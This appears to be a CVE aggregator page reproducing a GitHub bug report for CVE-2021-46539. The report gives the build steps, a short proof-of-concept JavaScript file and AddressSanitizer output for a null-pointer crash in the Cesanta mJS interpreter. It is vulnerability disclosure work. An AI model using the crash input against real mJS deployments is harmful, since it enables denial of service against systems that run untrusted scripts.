Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46539: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) · Issue #217 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /lib/x86_64-linux-gnu/libc.so.6+0x45a1f. This vulnerability can lead to a Denial of Service (DoS).

CVE
Open in Source
#vulnerability#ubuntu#linux#dos#js#git

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

@hope-fly

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

function JSEtest() {
    let arr = [1];
    [[arr.push(0, 17)].push([arr.push(0, 17)].push(0, 17))];
}
JSEtest();

Execution steps & Output

$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==126169==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fb20926da20 bp 0x000000000000 sp 0x7ffc6083ff90 T0) ==126169==The signal is caused by a READ memory access. ==126169==Hint: address points to the zero page. #0 0x7fb20926da1f (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) #1 0x5619439c70b3 in cstr_to_ulong src/mjs_string.c:232 #2 0x5619439c70b3 in str_to_ulong src/mjs_string.c:242 #3 0x5619438ff7bb in mjs_array_length src/mjs_array.c:83 #4 0x5619438ff7bb in mjs_array_push src/mjs_array.c:115 #5 0x5619438ff7bb in mjs_array_push_internal src/mjs_array.c:131 #6 0x561943924244 in mjs_execute src/mjs_exec.c:853 #7 0x56194392da05 in mjs_exec_internal src/mjs_exec.c:1073 #8 0x56194392da05 in mjs_exec_file src/mjs_exec.c:1096 #9 0x5619438ea909 in main src/mjs_main.c:47 #10 0x7fb209249b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5619438eb449 in _start (/usr/local/bin/Gmjs+0xe449)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x45a1f) ==126169==ABORTING

Credits: Found by OWL337 team.

1 participant

@hope-fly

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE